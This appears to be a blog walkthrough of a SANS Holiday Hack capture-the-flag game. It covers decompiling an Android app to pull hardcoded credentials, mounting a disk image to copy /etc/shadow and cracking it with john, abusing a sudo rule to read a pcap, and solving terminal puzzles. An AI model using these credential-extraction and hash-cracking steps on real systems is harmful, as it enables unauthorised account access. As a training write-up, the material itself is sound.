GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ ELFJOYCHRISTMASNORTHPOLEWPEACEONEARTHNORTHPOLEQ@^.]HOHOHOHOHOHOELFCHRISTMAS HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY CHRISTMASJOYPEACEONEARTHJOYSANTAQWCHRISTMASQ@"....]JOYGOODWILLTOWARDSMENJOY GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW".......]PEACEONEARTHELFQQWELFWQQ GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW"..........]GOODWILLTOWARDSMENELFELF JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO PEACEONEARTHGOODWILLTOWARDSMENWJOYQW".............]HOHOHOHOHOHONORTHPOLEJOY ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ

Answer: BUGBOUNTY

What is inside the ZIP file distributed by santas team?

For this we look at the instagram account. We spot a picture of a very untidy desk. Looking a little closer there are a few things of interest that can help us identify the zip file.

A zip name and a domain name. - http://northpolewonderland.com/SantaGram_v4.2.zip We can use the password bugbounty we got from the previous question to unlock the zip and we get:

APK file.

What username and password are embedded in the APK file?

For this we need to decompile the APK back in to something resembling source code so we can look through the code.

The clues walking around the North Pole suggested apktool, sounds like a good idea to me. Follow the install guide at https://ibotpeaches.github.io/Apktool/install/

thehermit@TECHANARCHY:~/SANS$ apktool d SantaGram_4.2.apk I: Using Apktool 2.2.1 on SantaGram_4.2.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /home/thehermit/.local/share/apktool/framework/1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values */* XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files... thehermit@TECHANARCHY:~/SANS$

I now have a folder with all the decompiled source code, and there’s a lot of it. Grep is going to be my friend here. Im looking for usernames and passwords to lets start there.

egrep -r -A2 'username|password' SantaGram_4.2

This command tells grep to use regualr expresssions search for ‘username’ OR ‘password’ and to read all files recursively in the SantaGram_4.2 folder which is where all our source is now stored. the -A2 tells grep to also display 2 lines after the match. This is because in smali the variable name is set on one line then the value stored on the line after.

. . . SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali: const-string v1, "username" SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali- SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali- const-string v2, "guest" -- SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali: const-string v1, "password" SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali- SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali- const-string v2, "busyreindeer78" . . .

That looks like our answer

Username = guest password = busyreindeer78

What is the name of the audible component (audio file) in the SantaGram APK file?

We are looking for an audio file so lets search for MP3’s

thehermit@TECHANARCHY:~/SANS$ find SantaGram_4.2/ -type f -name *.mp3 SantaGram_4.2/res/raw/discombobulatedaudio1.mp3

This command tells find to look recursivly through the SantaGram_4.2 directory and list all items that are files and match the filename *.mp3 If the file wasn’t named as an mp3 or was some other format we could use the file command on all files and see which are detected as audio.

thehermit@TECHANARCHY:~/SANS$ find SantaGram_4.2 -type f -exec file {} + | grep audio SantaGram_4.2/res/raw/discombobulatedaudio1.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

One of the useful elements of find is that when it finds an item that matches you can run other commands on these files. In this case for every item that is a file it will run the unix file command. with the -exec option. From here we just pipe the output in to grep to filter for audio files.

Whichever way you try the answer is discombobulatedaudio1.mp3

What is the password for the “cranpi” account on the Cranberry Pi System?

Before you can answer this question you need to complete the Cranberry Pi Quests and assembled your Pi, See the Quests for more information. Once the Pi is assembled by Holly Evergreen you will be given a Cranbian Image to download https://www.northpolewonderland.com/cranbian.img.zip

Once unzipped file tells us its: x86 boot sector. So as expected this is an image file. The easiest way to get the current password is to grab a copy of the /etc/shadow file and crack the hashes.

First lets mount the image so we can grab the file we need. To mount the os partition we first need to calculate the starting offset of the partition and then use the mount command.

thehermit@TECHANARCHY:~/SANS$ fdisk -l cranbian-jessie.img Disk cranbian-jessie.img: 1389 MB, 1389363200 bytes 255 heads, 63 sectors/track, 168 cylinders, total 2713600 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x5a7089a1 Device Boot Start End Blocks Id System cranbian-jessie.img1 8192 137215 64512 c W95 FAT32 (LBA) cranbian-jessie.img2 137216 2713599 1288192 83 Linux thehermit@TECHANARCHY:~/SANS$

fdisk tells us there are two partitions on this image. The first is typically the boot partition and the second is the OS partition. In this instance the Linux partition starts at 137216 and the sector size is 512 bytes. If we multiply these together we can get the physical offset in the file of our OS File System. 70254592.

Then its just a matter of mounting it and copying out the /etc/passwd and /etc/shadow files.

root@kali:~# mkdir cranbian_mount root@kali:~# mount -o loop,offset=70254592 cranbian-jessie.img cranbian_mount/ root@kali:~# cp cranbian_mount/etc/passwd . root@kali:~# cp cranbian_mount/etc/sh shadow shadow- shells root@kali:~# cp cranbian_mount/etc/sh shadow shadow- shells root@kali:~# cp cranbian_mount/etc/shadow .

We have the hash for the cranpi account

root:*:17067:0:99999:7::: daemon:*:17067:0:99999:7::: bin:*:17067:0:99999:7::: sys:*:17067:0:99999:7::: sync:*:17067:0:99999:7::: games:*:17067:0:99999:7::: man:*:17067:0:99999:7::: lp:*:17067:0:99999:7::: mail:*:17067:0:99999:7::: news:*:17067:0:99999:7::: uucp:*:17067:0:99999:7::: proxy:*:17067:0:99999:7::: www-data:*:17067:0:99999:7::: backup:*:17067:0:99999:7::: list:*:17067:0:99999:7::: irc:*:17067:0:99999:7::: gnats:*:17067:0:99999:7::: nobody:*:17067:0:99999:7::: systemd-timesync:*:17067:0:99999:7::: systemd-network:*:17067:0:99999:7::: systemd-resolve:*:17067:0:99999:7::: systemd-bus-proxy:*:17067:0:99999:7::: messagebus:*:17067:0:99999:7::: avahi:*:17067:0:99999:7::: ntp:*:17067:0:99999:7::: sshd:*:17067:0:99999:7::: statd:*:17067:0:99999:7::: cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

Now time to get cracking, Another elf in the North Pole suggested the rockyou word list, which is included in kali, would be a good choice.

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt --fork=4 combined.txt Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x]) Node numbers 1-4 of 4 (fork) Press 'q' or Ctrl-C to abort, almost any other key for status

It doesn’t take long before our password is cracked.

root@kali:~# john combined.txt --show cranpi:yummycookies:1000:1000:,,,:/home/cranpi:/bin/bash 1 password hash cracked, 0 left root@kali:~#

Answer: yummycookies

How did you open each terminal door and where had the villain imprisoned Santa?

Now we have completed the Cranberry Pi Achievements we can access the terminals in the north pole. There are 5 terminals and you can use the Maps at the end of this post to figure out where each one is located.

Elf House #2 - Peacoats and Pcaps

When you first load the terminal you are presented with the following.

Seems simple enough lets tcpdump /out.pcap and see what we have

scratchy@f104dddd0fc6:/$ tcpdump -r out.pcap tcpdump: out.pcap: Permission denied scratchy@f104dddd0fc6:/$

Ok not that simple then. Lets have a look at the permissions on the pcap file.

scratchy@f104dddd0fc6:/$ ls -ahtl /out.pcap -r-------- 1 itchy itchy 1.1M Dec 2 15:05 /out.pcap

Seems itchy is the only person who can read the file. We need to be itchy. Lets try a few ways to run tcpdump as itchy

scratchy@f104dddd0fc6:/$ su - itchy -c tcpdump /out.pcap Password:

That’s not going to work

scratchy@f104dddd0fc6:/$ sudo -u itchy tcpdump -r /out.pcap sudo: unable to resolve host f104dddd0fc6 reading from file out.pcap, link-type EN10MB (Ethernet) 11:28:00.520764 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [S], seq 2857348850, win 65535, options [mss 1460,nop,wscale 5,nop,nop,TS val 2773686863 ecr 0,sackOK,eol], length 0 11:28:00.520829 IP 192.168.188.130.http > 192.168.188.1.52102: Flags [S.], seq 2484589859, ack 2857348851, win 28960, options [mss 1460,sackOK,TS val 638274 ecr 2773686863,nop,wscale 7], l ength 0 11:28:00.520967 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [.], ack 1, win 4117, opt ions [nop,nop,TS val 2773686863 ecr 638274], length 0 11:28:00.521004 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [P.], seq 1:160, ack 1, w in 4117, options [nop,nop,TS val 2773686863 ecr 638274], length 159 11:28:00.521010 IP 192.168.188.130.http > 192.168.188.1.52102: Flags [.], ack 160, win 235, op tions [nop,nop,TS val 638274 ecr 2773686863], length 0

Excellent looks like there is an entry in the /etc/sudoers file that will let us access this file.

now lets see about that password. tcpdump gave us a lot of output, I’m probably looking for clear text password to lets just try strings

scratchy@f104dddd0fc6:/$ sudo -u itchy strings out.pcap sudo: unable to resolve host f104dddd0fc6 ZAX< ZAX} ZAX, BGET /firsthalf.html HTTP/1.1 User-Agent: Wget/1.17.1 (darwin15.2.0) Accept: */* Accept-Encoding: identity Host: 192.168.188.130 Connection: Keep-Alive ZAX2 4hf@ Ehg@ OHTTP/1.0 200 OK ZAX ZAX# [hh@ OServer: SimpleHTTP/0.6 Python/2.7.12+ ZAXr rhi@ ODate: Fri, 02 Dec 2016 11:28:00 GMT Content-type: text/html Ihj@ PContent-Length: 113 ZAX ZAX2 ZAXI dhk@ PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT P<html> <head></head> <body> <form> <input type="hidden" name="part1" value="santasli" /> </form> </body> </html> 4hm@ ZAXW @2/@ DGET /secondhalf.bin HTTP/1.1 User-Agent: Wget/1.17.1 (darwin15.2.0) Accept: */* Accept-Encoding: identity Host: 192.168.188.130 Connection: Keep-Alive ZAX THTTP/1.0 200 OK TServer: SimpleHTTP/0.6 Python/2.7.12+ ZAX" ,#"=X TDate: Fri, 02 Dec 2016 11:28:00 GMT Content-type: application/octet-stream ZAXr ,#o=X UContent-Length: 1048097 Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT 4-1@

This gives us part one “santasli” and as any good Simpsons fan will tell you. The full password is going to be santaslittlehelper. But how can we read that bin file that contains the secondhalf?

Lets try strings again and change the encoding to read unicode strings.

scratchy@f104dddd0fc6:/$ sudo -u itchy strings -e l out.pcap sudo: unable to resolve host f104dddd0fc6 part2:ttlehelper

That confirms it. The password to the door is santaslittlehelper

Workshop Spiral Stairs - The one who Knocks

When you first open the terminal you are presented with the following.

Find the passphrase deep in the directories. Ok recursive ls seems like a good shout here.

elf@0b29d16c9a9b:~$ ls -ahtlR .: total 32K drwxr-xr-x 20 elf elf 4.0K Dec 6 19:40 . drwxr-xr-x 22 root root 4.0K Dec 6 19:40 .. -rw-r--r-- 1 elf elf 3.9K Dec 6 19:40 .bashrc drwxr-xr-x 18 root root 4.0K Dec 6 19:40 .doormat drwxr-xr-x 2 root root 4.0K Dec 6 19:39 var drwxr-xr-x 2 root root 4.0K Dec 6 19:39 temp -rw-r--r-- 1 elf elf 220 Nov 12 2014 .bash_logout -rw-r--r-- 1 elf elf 675 Nov 12 2014 .profile ./.doormat: total 20K drwxr-xr-x 20 elf elf 4.0K Dec 6 19:40 .. drwxr-xr-x 18 root root 4.0K Dec 6 19:40 . drwxr-xr-x 16 root root 4.0K Dec 6 19:40 . drwxr-xr-x 2 root root 4.0K Dec 6 19:39 share drwxr-xr-x 2 root root 4.0K Dec 6 19:39 temp ./.doormat/. : total 20K drwxr-xr-x 14 root root 4.0K Dec 6 19:40 drwxr-xr-x 16 root root 4.0K Dec 6 19:40 . drwxr-xr-x 18 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:39 bin drwxr-xr-x 2 root root 4.0K Dec 6 19:39 not_here ./.doormat/. / : total 20K drwxr-xr-x 14 root root 4.0K Dec 6 19:40 . drwxr-xr-x 16 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 12 root root 4.0K Dec 6 19:40 \ drwxr-xr-x 2 root root 4.0K Dec 6 19:40 opt drwxr-xr-x 2 root root 4.0K Dec 6 19:39 var ./.doormat/. / /\: total 20K drwxr-xr-x 12 root root 4.0K Dec 6 19:40 . drwxr-xr-x 14 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 10 root root 4.0K Dec 6 19:40 \\ drwxr-xr-x 2 root root 4.0K Dec 6 19:40 santa drwxr-xr-x 2 root root 4.0K Dec 6 19:40 ls ./.doormat/. / /\/\\: total 20K drwxr-xr-x 10 root root 4.0K Dec 6 19:40 . drwxr-xr-x 12 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 8 root root 4.0K Dec 6 19:40 Don't Look Here! drwxr-xr-x 2 root root 4.0K Dec 6 19:40 holiday drwxr-xr-x 2 root root 4.0K Dec 6 19:40 temp ./.doormat/. / /\/\\/Don't Look Here!: total 20K drwxr-xr-x 8 root root 4.0K Dec 6 19:40 . drwxr-xr-x 10 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 6 root root 4.0K Dec 6 19:40 You are persistent, aren't you? drwxr-xr-x 2 root root 4.0K Dec 6 19:40 secret drwxr-xr-x 2 root root 4.0K Dec 6 19:40 files ./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?: total 20K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 ' drwxr-xr-x 6 root root 4.0K Dec 6 19:40 . drwxr-xr-x 8 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 cookbook drwxr-xr-x 2 root root 4.0K Dec 6 19:40 temp ./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/': total 12K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . drwxr-xr-x 6 root root 4.0K Dec 6 19:40 .. -rw-r--r-- 1 root root 17 Dec 6 19:39 key_for_the_door.txt ./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook: total 8.0K drwxr-xr-x 6 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp: total 8.0K drwxr-xr-x 6 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /\/\\/Don't Look Here!/secret: total 8.0K drwxr-xr-x 8 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /\/\\/Don't Look Here!/files: total 8.0K drwxr-xr-x 8 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /\/\\/holiday: total 8.0K drwxr-xr-x 10 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /\/\\/temp: total 8.0K drwxr-xr-x 10 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /\/santa: total 8.0K drwxr-xr-x 12 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /\/ls: total 8.0K drwxr-xr-x 12 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /opt: total 8.0K drwxr-xr-x 14 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . ./.doormat/. / /var: total 8.0K drwxr-xr-x 14 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:39 . ./.doormat/. /bin: total 8.0K drwxr-xr-x 16 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:39 . ./.doormat/. /not_here: total 8.0K drwxr-xr-x 16 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:39 . ./.doormat/share: total 8.0K drwxr-xr-x 18 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:39 . ./.doormat/temp: total 8.0K drwxr-xr-x 18 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:39 . ./var: total 8.0K drwxr-xr-x 20 elf elf 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:39 . ./temp: total 8.0K drwxr-xr-x 20 elf elf 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:39 . elf@0b29d16c9a9b:~$

key_for_the_door.txt looks like a winner. But how to read it. I don’t really feel like trying to escape all those directory names. Fortunately i don’t need to. As we saw earlier find has a nice exec feature and will let me target only a single file by name.

elf@0b29d16c9a9b:~$ find -name key_for_the_door.txt -exec cat {} + key: open_sesame

This command is as simple as it looks. FInd a file named key_for_the_door.txt and then run cat against the file. Which then outputs the contents of the file.

Password for the door is open_sesame

Santas Office - Chess

When you first open the terminal you are presented with the following.

Fans of the film WarGames should immediately recognise this and it doesn’t take long to realise we are playing the role of David. To complete this challenge just play out the scene making sure you get all the case and punctuation correct.

GREETINGS PROFESSOR FALKEN. Hello. HOW ARE YOU FEELING TODAY? I'm fine. How are you? EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73? People sometimes make mistakes. YES THEY DO. SHALL WE PLAY A GAME? Love to. How about Global Thermonuclear War? WOULDN'T YOU PREFER A GOOD GAME OF CHESS? Later. Let's play Global Thermonuclear War. FINE ,------~~v,_ _ _--^\ |' \ ,__/ || _/ /,_ _ / \,/ / ,, _,,/^ v v-___ | / |'~^ \ \ | _/ _ _/^ \ / / ,~~^/ | ^~~_ _ _ / | __,, _v__\ \/ '~~, , ~ \ \ ^~ / ~ // \/ \/ \~, ,/ ~~ UNITED STATES SOVIET UNION WHICH SIDE DO YOU WANT? 1. UNITED STATES 2. SOVIET UNION PLEASE CHOOSE ONE: 2 AWAITING FIRST STRIKE COMMAND ----------------------------- PLEASE LIST PRIMARY TARGETS BY CITY AND/OR COUNTRY NAME: Las Vegas LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: LOOK AT THE PRETTY LIGHTS Press Enter To Continue

Password to the secret bookcase: LOOK AT THE PRETTY LIGHTS

Workshop - Top stairs - Gone Spelunking.

When you first open the terminal you are presented with the following

a quick ls show us an executable file named wumpus and opening this drops us in to an old school mud.

elf@904691c2cd69:~$ ./wumpus Instructions? (y-n) y Sorry, but the instruction file seems to have disappeared in a puff of greasy black smoke! (poof) You're in a cave with 20 rooms and 3 tunnels leading from each room. There are 3 bats and 3 pits scattered throughout the cave, and your quiver holds 5 custom super anti-evil Wumpus arrows. Good luck. You are in room 16 of the cave, and have 5 arrows left. *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 13, 15, and 19. Move or shoot? (m-s)

No instructions sad times. what about checking for command line help

elf@904691c2cd69:~$ ./wumpus --help ./wumpus: invalid option -- '-' usage: wump [parameters] elf@904691c2cd69:~$

OK. No help but looks like it accepts command line parameters. Lets have a play.

elf@904691c2cd69:~$ ./wumpus -a ./wumpus: option requires an argument -- 'a' usage: wump [parameters] elf@904691c2cd69:~$ ./wumpus -a a Instructions? (y-n) n You're in a cave with 20 rooms and 3 tunnels leading from each room. There are 3 bats and 3 pits scattered throughout the cave, and your quiver holds 0 custom super anti-evil Wumpus arrows. Good luck. You are in room 3 of the cave, and have 0 arrows left. *rustle* *rustle* (must be bats nearby) There are tunnels to rooms 6, 15, and 20. Move or shoot? (m-s)

OK so running with -a a seems to open the game and now i have 0 arrows. I had 5 before.

elf@904691c2cd69:~$ ./wumpus -a 100000 Instructions? (y-n) n You're in a cave with 20 rooms and 3 tunnels leading from each room. There are 3 bats and 3 pits scattered throughout the cave, and your quiver holds 100000 custom super anti-evil Wumpus arrows. Good luck. You are in room 8 of the cave, and have 100000 arrows left. *rustle* *rustle* (must be bats nearby) *whoosh* (I feel a draft from some pits). There are tunnels to rooms 12, 17, and 19. Move or shoot? (m-s)

Excellent 100,000 custom super anti-evil Wumpus arrows, lets see what else we can set.

-a i = number of arrows

-b i = Number of Bats

-p i = Number of Pitts

-r i = Number of Rooms (Although Wumpus refuses to play with less than 6 rooms)

elf@904691c2cd69:~$ ./wumpus -b 0 -p 0 -a 100 -r 6 Instructions? (y-n) n You're in a cave with 6 rooms and 3 tunnels leading from each room. There are 0 bats and 0 pits scattered throughout the cave, and your quiver holds 100 custom super anti-evil Wumpus arrows. Good luck. You are in room 6 of the cave, and have 100 arrows left. *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 1, 3, and 5. Move or shoot? (m-s) #

The Wumpus is in one of the adjoining rooms so im just going to fire an arrow in to each one.

